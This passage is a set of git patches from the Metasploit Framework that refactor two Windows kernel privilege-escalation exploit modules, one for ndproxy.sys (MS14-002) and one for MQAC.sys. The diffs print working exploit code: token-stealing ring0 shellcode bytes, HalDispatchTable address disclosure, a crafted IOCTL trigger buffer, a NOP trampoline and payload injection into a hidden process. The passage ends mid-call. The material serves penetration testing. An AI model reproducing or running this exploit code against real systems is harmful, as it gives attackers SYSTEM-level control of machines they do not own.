-        ["PBLOB", "lpBaseName", "out"],
-        ["DWORD", "nSize", "in"]
-      ])
-  end
-
-  def open_device(dev)
-
-    invalid_handle_value = 0xFFFFFFFF
-
-    r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)
-
-    handle = r['return']
-
-    if handle == invalid_handle_value
-      return nil
-    end
-
-    return handle
-  end
-
-  def find_sys_base(drvname)
-    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
-
-    addresses.each do |address|
-      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0..results['return'] - 1]
-      if drvname == nil
-        if current_drvname.downcase.include?('krnl')
-          return [address, current_drvname]
-        end
-      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
-        return [address, current_drvname]
-      end
-    end
-
-    return nil
   end
 
   def ring0_shellcode(t)
@@ -148,25 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
     restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L")  # mov eax, offset hal!HaliQuerySystemInformation
     restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
-    tokenstealing =  "\x52"                                                   # push edx                         # Save edx on the stack
-    tokenstealing << "\x53"                                                   # push ebx                         # Save ebx on the stack
-    tokenstealing << "\x33\xc0"                                               # xor eax, eax                     # eax = 0
-    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                           # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
-    tokenstealing << "\x8b\x40" + t['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
-    tokenstealing << "\x8b\xc8"                                               # mov ecx, eax
-    tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
-    tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
-    tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
-    tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
-    tokenstealing << "\x75\xe8"                                               # jne 0000101e ======================
-    tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
-    tokenstealing << "\x8b\xc1"                                               # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
-    tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
-    tokenstealing << "\x5b"                                                   # pop ebx                          # Restores ebx
-    tokenstealing << "\x5a"                                                   # pop edx                          # Restores edx
-    tokenstealing << "\xc2\x10"                                               # ret 10h                          # Away from the kernel!
-
-    ring0_shellcode = restore_ptrs + tokenstealing
+    ring0_shellcode = restore_ptrs + token_stealing_shellcode(t)
     return ring0_shellcode
   end
 
@@ -211,33 +138,8 @@ class Metasploit3 < Msf::Exploit::Local
   def disclose_addresses(t)
     addresses = {}
 
-    vprint_status("Getting the Kernel module name...")
-    kernel_info = find_sys_base(nil)
-    if kernel_info.nil?
-      vprint_error("Failed to disclose the Kernel module name")
-      return nil
-    end
-    vprint_good("Kernel module found: #{kernel_info[1]}")
-
-    vprint_status("Getting a Kernel handle...")
-    kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
-    kernel32_handle = kernel32_handle['return']
-    if kernel32_handle == 0
-      vprint_error("Failed to get a Kernel handle")
-      return nil
-    end
-    vprint_good("Kernel handle acquired")
-
-
-    vprint_status("Disclosing the HalDispatchTable...")
-    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
-    hal_dispatch_table = hal_dispatch_table['return']
-    if hal_dispatch_table == 0
-      vprint_error("Failed to disclose the HalDispatchTable")
-      return nil
-    end
-    hal_dispatch_table -= kernel32_handle
-    hal_dispatch_table += kernel_info[0]
+    hal_dispatch_table = find_haldispatchtable
+    return nil if hal_dispatch_table.nil?
     addresses["halDispatchTable"] = hal_dispatch_table
     vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
 
@@ -257,16 +159,12 @@ class Metasploit3 < Msf::Exploit::Local
     return addresses
   end
 
-
   def check
-    vprint_status("Adding the railgun stuff...")
-    add_railgun_functions
-
     if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
       return Exploit::CheckCode::Detected
     end
 
-    handle = open_device("\\\\.\\NDProxy")
+    handle = open_device("\\\\.\\NDProxy", 0x0, 0x0, 0x3)
     if handle.nil?
       return Exploit::CheckCode::Safe
     end
@@ -289,10 +187,6 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def exploit
-
-    vprint_status("Adding the railgun stuff...")
-    add_railgun_functions
-
     if sysinfo["Architecture"] =~ /wow64/i
       fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
     elsif sysinfo["Architecture"] =~ /x64/
@@ -322,7 +216,7 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     print_status("Checking device...")
-    handle = open_device("\\\\.\\NDProxy")
+    handle = open_device("\\\\.\\NDProxy", 0x0, 0x0, 0x3)
     if handle.nil?
       fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
     else
@@ -409,9 +303,5 @@ class Metasploit3 < Msf::Exploit::Local
     else
       fail_with(Failure::Unknown, "Error while executing the payload")
     end
-
-
   end
-
 end
-

From a523898909fccd560cfa1d0df59a312b7a3bdb7b Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Mon, 4 Aug 2014 11:47:39 -0700
Subject: [PATCH 239/321] Apply rubocop suggestions for ms_ndproxy

---
 modules/exploits/windows/local/ms_ndproxy.rb | 183 +++++++++----------
 1 file changed, 89 insertions(+), 94 deletions(-)

diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb
index 4186b09a40..47cb9bc48e 100644
--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -15,10 +15,10 @@ class Metasploit3 < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info, {
-      'Name'          => 'MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation',
-      'Description'    => %q{
+      'Name'            => 'MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation',
+      'Description'     => %q(
         This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003
         SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while
         processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used
@@ -26,31 +26,31 @@ class Metasploit3 < Msf::Exploit::Local
         pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This
         module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to
         work the service "Routing and Remote Access" must be running on the target system.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        =>
+      ),
+      'License'         => MSF_LICENSE,
+      'Author'          =>
         [
           'Unknown', # Vulnerability discovery
           'ryujin', # python PoC
           'Shahin Ramezany', # C PoC
           'juan vazquez' # MSF module
         ],
-      'Arch'          => ARCH_X86,
-      'Platform'      => 'win',
-      'Payload'       =>
+      'Arch'            => ARCH_X86,
+      'Platform'        => 'win',
+      'Payload'         =>
         {
-          'Space' => 4096,
+          'Space'       => 4096,
           'DisableNops' => true
         },
-      'SessionTypes'  => [ 'meterpreter' ],
-      'DefaultOptions' =>
+      'SessionTypes'    => ['meterpreter'],
+      'DefaultOptions'  =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC'    => 'thread'
         },
-      'Targets'       =>
+      'Targets'         =>
         [
-          [ 'Automatic', { } ],
-          [ 'Windows XP SP3',
+          ['Automatic', {}],
+          ['Windows XP SP3',
             {
               'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
               '_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Local
               '_APLINKS' => "\x88"   # Offset to ActiveProcessLinks _EPROCESS struct
             }
           ],
-          [ 'Windows Server 2003 SP2',
+          ['Windows Server 2003 SP2',
             {
               'HaliQuerySystemInfo' => 0x1fa1e,
               '_KPROCESS' => "\x38",
@@ -69,40 +69,38 @@ class Metasploit3 < Msf::Exploit::Local
             }
           ]
         ],
-      'References'    =>
+      'References'      =>
         [
-          [ 'CVE', '2013-5065' ],
-          [ 'MSB', 'MS14-002' ],
-          [ 'OSVDB' , '100368'],
-          [ 'BID', '63971' ],
-          [ 'EDB', '30014' ],
-          [ 'URL', 'http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/' ],
-          [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2914486'],
-          [ 'URL', 'https://github.com/ShahinRamezany/Codes/blob/master/CVE-2013-5065/CVE-2013-5065.cpp' ],
-          [ 'URL', 'http://www.secniu.com/blog/?p=53' ],
-          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ],
-          [ 'URL', 'http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html' ]
+          %w(CVE 2013-5065),
+          %w(MSB MS14-002),
+          %w(OSVDB 100368),
+          %w(BID 63971),
+          %w(EDB 30014),
+          %w(URL http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/),
+          %w(URL http://technet.microsoft.com/en-us/security/advisory/2914486),
+          %w(URL https://github.com/ShahinRamezany/Codes/blob/master/CVE-2013-5065/CVE-2013-5065.cpp),
+          %w(URL http://www.secniu.com/blog/?p=53),
+          %w(URL http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html),
+          %w(URL http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html)
         ],
-      'DisclosureDate'=> 'Nov 27 2013',
-      'DefaultTarget' => 0
+      'DisclosureDate'  => 'Nov 27 2013',
+      'DefaultTarget'   => 0
     }))
   end
 
   def ring0_shellcode(t)
     restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
-    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L")  # mov eax, offset hal!HaliQuerySystemInformation
-    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
+    restore_ptrs << "\xb8" + [@addresses['HaliQuerySystemInfo']].pack('L')  # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [@addresses['halDispatchTable'] + 4].pack('L') # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
     ring0_shellcode = restore_ptrs + token_stealing_shellcode(t)
-    return ring0_shellcode
+    ring0_shellcode
   end
 
   def fill_memory(proc, address, length, content)
-
-    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
-
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [address].pack('L'), nil, [length].pack('L'), 'MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN', 'PAGE_EXECUTE_READWRITE')
     unless proc.memory.writable?(address)
-      vprint_error("Failed to allocate memory")
+      vprint_error('Failed to allocate memory')
       return nil
     end
 
@@ -111,13 +109,13 @@ class Metasploit3 < Msf::Exploit::Local
     result = proc.memory.write(address, content)
 
     if result.nil?
-      vprint_error("Failed to write contents to memory")
+      vprint_error('Failed to write contents to memory')
       return nil
     else
       vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
     end
 
-    return address
+    address
   end
 
   def create_proc
@@ -125,14 +123,14 @@ class Metasploit3 < Msf::Exploit::Local
     cmd = "#{windir}\\System32\\notepad.exe"
     # run hidden
     begin
-      proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+      proc = session.sys.process.execute(cmd, nil, 'Hidden' => true)
     rescue Rex::Post::Meterpreter::RequestError
       # when running from the Adobe Reader sandbox:
       # Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
       return nil
     end
 
-    return proc.pid
+    proc.pid
   end
 
   def disclose_addresses(t)
@@ -140,37 +138,36 @@ class Metasploit3 < Msf::Exploit::Local
 
     hal_dispatch_table = find_haldispatchtable
     return nil if hal_dispatch_table.nil?
-    addresses["halDispatchTable"] = hal_dispatch_table
-    vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
+    addresses['halDispatchTable'] = hal_dispatch_table
+    vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")
 
-    vprint_status("Getting the hal.dll Base Address...")
-    hal_info = find_sys_base("hal.dll")
+    vprint_status('Getting the hal.dll Base Address...')
+    hal_info = find_sys_base('hal.dll')
     if hal_info.nil?
-      vprint_error("Failed to disclose hal.dll Base Address")
+      vprint_error('Failed to disclose hal.dll Base Address')
       return nil
     end
     hal_base = hal_info[0]
     vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}")
 
     hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
-    addresses["HaliQuerySystemInfo"] = hali_query_system_information
+    addresses['HaliQuerySystemInfo'] = hali_query_system_information
 
-    vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}")
-    return addresses
+    vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
+    addresses
   end
 
   def check
-    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+    if sysinfo['Architecture'] =~ /wow64/i || sysinfo['Architecture'] =~ /x64/
       return Exploit::CheckCode::Detected
     end
 
-    handle = open_device("\\\\.\\NDProxy", 0x0, 0x0, 0x3)
-    if handle.nil?
-      return Exploit::CheckCode::Safe
-    end
+    handle = open_device('\\\\.\\NDProxy', 0x0, 0x0, 0x3)
+    return Exploit::CheckCode::Safe if handle.nil?
+
     session.railgun.kernel32.CloseHandle(handle)
 
-    os = sysinfo["OS"]
+    os = sysinfo['OS']
     case os
     when /windows xp.*service pack 3/i
       return Exploit::CheckCode::Appears
@@ -183,27 +180,26 @@ class Metasploit3 < Msf::Exploit::Local
     else
       return Exploit::CheckCode::Safe
     end
-
   end
 
   def exploit
-    if sysinfo["Architecture"] =~ /wow64/i
-      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
-    elsif sysinfo["Architecture"] =~ /x64/
-      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    if sysinfo['Architecture'] =~ /wow64/i
+      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
+    elsif sysinfo['Architecture'] =~ /x64/
+      fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')
     end
 
     my_target = nil
     if target.name =~ /Automatic/
-      print_status("Detecting the target system...")
-      os = sysinfo["OS"]
+      print_status('Detecting the target system...')
+      os = sysinfo['OS']
       if os =~ /windows xp.*service pack 3/i
         my_target = targets[1]
         print_status("Running against #{my_target.name}")
-      elsif ((os =~ /2003/) and (os =~ /service pack 2/i))
+      elsif (os =~ /2003/) && (os =~ /service pack 2/i)
         my_target = targets[2]
         print_status("Running against #{my_target.name}")
-      elsif ((os =~ /\.net server/i) and (os =~ /service pack 2/i))
+      elsif (os =~ /\.net server/i) && (os =~ /service pack 2/i)
         my_target = targets[2]
         print_status("Running against #{my_target.name}")
       end
@@ -212,96 +208,95 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     if my_target.nil?
-      fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
+      fail_with(Failure::NoTarget, 'Remote system not detected as target, select the target manually')
     end
 
-    print_status("Checking device...")
-    handle = open_device("\\\\.\\NDProxy", 0x0, 0x0, 0x3)
+    print_status('Checking device...')
+    handle = open_device('\\\\.\\NDProxy', 0x0, 0x0, 0x3)
     if handle.nil?
-      fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
+      fail_with(Failure::NoTarget, '\\\\.\\NDProxy device not found')
     else
-      print_good("\\\\.\\NDProxy found!")
+      print_good('\\\\.\\NDProxy found!')
     end
 
-    print_status("Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...")
+    print_status('Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...')
     @addresses = disclose_addresses(my_target)
     if @addresses.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Filed to disclose necessary addresses for exploitation. Aborting.")
+      fail_with(Failure::Unknown, 'Failed to disclose necessary addresses for exploitation, aborting.')
     else
-      print_good("Addresses successfully disclosed.")
+      print_good('Addresses successfully disclosed.')
     end
 
-
-    print_status("Storing the kernel stager on memory...")
+    print_status('Storing the kernel stager in memory...')
     this_proc = session.sys.process.open
     kernel_shell = ring0_shellcode(my_target)
     kernel_shell_address = 0x1000
     result = fill_memory(this_proc, kernel_shell_address, kernel_shell.length, kernel_shell)
     if result.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
+      fail_with(Failure::Unknown, 'Error while storing the kernel stager shellcode on memory')
     else
       print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
     end
 
-    print_status("Storing the trampoline to the kernel stager on memory...")
+    print_status('Storing the trampoline to the kernel stager on memory...')
     trampoline = "\x90" * 0x38       # nops
     trampoline << "\x68"             # push opcode
-    trampoline << [0x1000].pack("V") # address to push
+    trampoline << [0x1000].pack('V') # address to push
     trampoline << "\xc3"             # ret
     trampoline_addr = 0x1
     result = fill_memory(this_proc, trampoline_addr, trampoline.length, trampoline)
     if result.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Error while storing trampoline on memory")
+      fail_with(Failure::Unknown, 'Error while storing trampoline on memory')
     else
       print_good("Trampoline successfully stored at 0x#{trampoline_addr.to_s(16)}")
     end
 
-    print_status("Storing the IO Control buffer on memory...")
+    print_status('Storing the IO Control buffer on memory...')
     buffer = "\x00" * 1024
-    buffer[20, 4] = [0x7030125].pack("V") # In order to trigger the vulnerable call
-    buffer[28, 4] = [0x34].pack("V")      # In order to trigger the vulnerable call
+    buffer[20, 4] = [0x7030125].pack('V') # In order to trigger the vulnerable call
+    buffer[28, 4] = [0x34].pack('V')      # In order to trigger the vulnerable call
     buffer_addr = 0x0d0d0000
     result = fill_memory(this_proc, buffer_addr, buffer.length, buffer)
     if result.nil?
       session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Unknown, "Error while storing the IO Control buffer on memory")
+      fail_with(Failure::Unknown, 'Error while storing the IO Control buffer on memory')
     else
       print_good("IO Control buffer successfully stored at 0x#{buffer_addr.to_s(16)}")
     end
 
-    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
+    print_status('Triggering the vulnerability, corrupting the HalDispatchTable...')
     magic_ioctl = 0x8fff23c8
     # Values taken from the exploit in the wild, see references
-    ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, buffer_addr, buffer.length, buffer_addr, 0x80)
+    session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, buffer_addr, buffer.length, buffer_addr, 0x80)
 
     session.railgun.kernel32.CloseHandle(handle)
 
-    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
-    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
+    print_status('Executing the Kernel Stager throw NtQueryIntervalProfile()...')
+    session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
 
-    print_status("Checking privileges after exploitation...")
+    print_status('Checking privileges after exploitation...')
 
     unless is_system?
-      fail_with(Failure::Unknown, "The exploitation wasn't successful")
+      fail_with(Failure::Unknown, 'The exploitation was not successful')
     end
 
     p = payload.encoded
-    print_good("Exploitation successful! Creating a new process and launching payload...")
+    print_good('Exploitation successful! Creating a new process and launching payload...')
     new_pid = create_proc
 
     if new_pid.nil?
-      print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...")
+      print_warning('Unable to create a new process, maybe you are in a sandbox. If the current process has been elevated try to migrate before executing a new process...')
       return
     end
 
-    print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
+    print_status("Injecting #{p.length} bytes into #{new_pid} memory and executing it...")
     if execute_shellcode(p, nil, new_pid)
-      print_good("Enjoy")
+      print_good('Enjoy')
     else
-      fail_with(Failure::Unknown, "Error while executing the payload")
+      fail_with(Failure::Unknown, 'Error while executing the payload')
     end
   end
 end

From 9cd6353246e05274266d6f9a060cf2c7587e9a4d Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Mon, 4 Aug 2014 12:15:39 -0700
Subject: [PATCH 240/321] Update mqac_write to use the mixin and restore
 pointers

---
 modules/exploits/windows/local/mqac_write.rb | 99 +++++---------------
 modules/exploits/windows/local/ms_ndproxy.rb |  8 +-
 2 files changed, 27 insertions(+), 80 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index 6b6401dc6e..e8c3ae4b7f 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -4,16 +4,16 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/local/windows_kernel'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
+  include Msf::Exploit::Local::WindowsKernel
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
-  INVALID_HANDLE_VALUE = 0xFFFFFFFF
-
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
@@ -41,6 +41,7 @@ class Metasploit3 < Msf::Exploit::Local
         [
           ['Windows XP SP3',
            {
+             'HaliQuerySystemInfo' => 0x16bba,
              '_KPROCESS'  => "\x44",
              '_TOKEN'     => "\xc8",
              '_UPID'      => "\x84",
@@ -52,41 +53,13 @@ class Metasploit3 < Msf::Exploit::Local
         [
           %w(CVE 2014-4971),
           %w(EDB 34112),
-          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
+          %w(URL https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt)
         ],
       'DisclosureDate' => 'Jul 22 2014',
       'DefaultTarget'  => 0
     ))
   end
 
-  def find_sys_base(drvname)
-    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
-    lp_image_base = %w(PBLOB lpImageBase out)
-    cb = %w(DWORD cb in)
-    lpcb_needed = %w(PDWORD lpcbNeeded out)
-    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL',
-                                 [lp_image_base, cb, lpcb_needed])
-    image_base = %w(LPVOID ImageBase in)
-    lp_base_name = %w(PBLOB lpBaseName out)
-    n_size = %w(DWORD nSize in)
-    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD',
-                                 [image_base, lp_base_name, n_size])
-    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
-
-    addresses.each do |address|
-      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0..results['return'] - 1]
-      if drvname.nil?
-        if current_drvname.downcase.include?('krnl')
-          return [address, current_drvname]
-        end
-      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
-        return [address, current_drvname]
-      end
-    end
-  end
-
   # Function borrowed from smart_hashdump
   def get_system_proc
     # Make sure you got the correct SYSTEM Account Name no matter the OS Language
@@ -106,20 +79,9 @@ class Metasploit3 < Msf::Exploit::Local
     end
   end
 
-  def open_device
-    handle = session.railgun.kernel32.CreateFileA('\\\\.\\MQAC',
-      'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
-    handle = handle['return']
-    if handle == 0
-      print_error('Failed to open the \\\\.\\MQAC device')
-      return nil
-    end
-    handle
-  end
-
   def check
-    handle = open_device
-    if handle.nil? || handle == INVALID_HANDLE_VALUE
+    handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    if handle.nil?
       print_error('MSMQ installation not found')
       return Exploit::CheckCode::Safe
     end
@@ -155,12 +117,9 @@ class Metasploit3 < Msf::Exploit::Local
     # results in a BSOD and so we should not let that happen.
     return unless check == Exploit::CheckCode::Appears
 
-    kernel_info = find_sys_base(nil)
     base_addr = 0xffff
-    print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
-
-    handle = open_device
-    return if handle.nil? || handle == INVALID_HANDLE_VALUE
+    handle = open_device('\\\\.\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    return if handle.nil?
 
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)
@@ -175,41 +134,29 @@ class Metasploit3 < Msf::Exploit::Local
       return
     end
 
-    hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
-    hKernel = hKernel['return']
-    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel,
-                                                              'HalDispatchTable')
-    halDispatchTable = halDispatchTable['return']
-    halDispatchTable -= hKernel
-    halDispatchTable += kernel_info[0]
-    print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
+    haldispatchtable = find_haldispatchtable
+    return if haldispatchtable.nil?
+    print_status("HalDisPatchTable Address: 0x#{haldispatchtable.to_s(16)}")
 
-    tokenstealing  = "\x52"                                                        # push edx                         # Save edx on the stack
-    tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
-    tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
-    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
-    tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
-    tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
-    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
-    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
-    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
-    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
-    tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
-    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
-    tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
-    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
-    tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
-    tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
-    tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
+    vprint_status('Getting the hal.dll base address...')
+    hal_info = find_sys_base('hal.dll')
+    fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?
+    hal_base = hal_info[0]
+    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
+    hali_query_system_information = hal_base + target['HaliQuerySystemInfo']
 
-    shellcode = make_nops(0x200) + tokenstealing
+    restore_ptrs =  "\x31\xc0"                                         # xor eax, eax
+    restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [haldispatchtable + 4].pack('V')          # mov dword ptr [nt!HalDispatchTable+0x4], eax
+
+    shellcode = make_nops(0x200) + restore_ptrs + token_stealing_shellcode(target)
     this_proc.memory.write(0x1, shellcode)
     this_proc.close
 
     print_status('Triggering vulnerable IOCTL')
     session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,
                                                 1, 0x258,
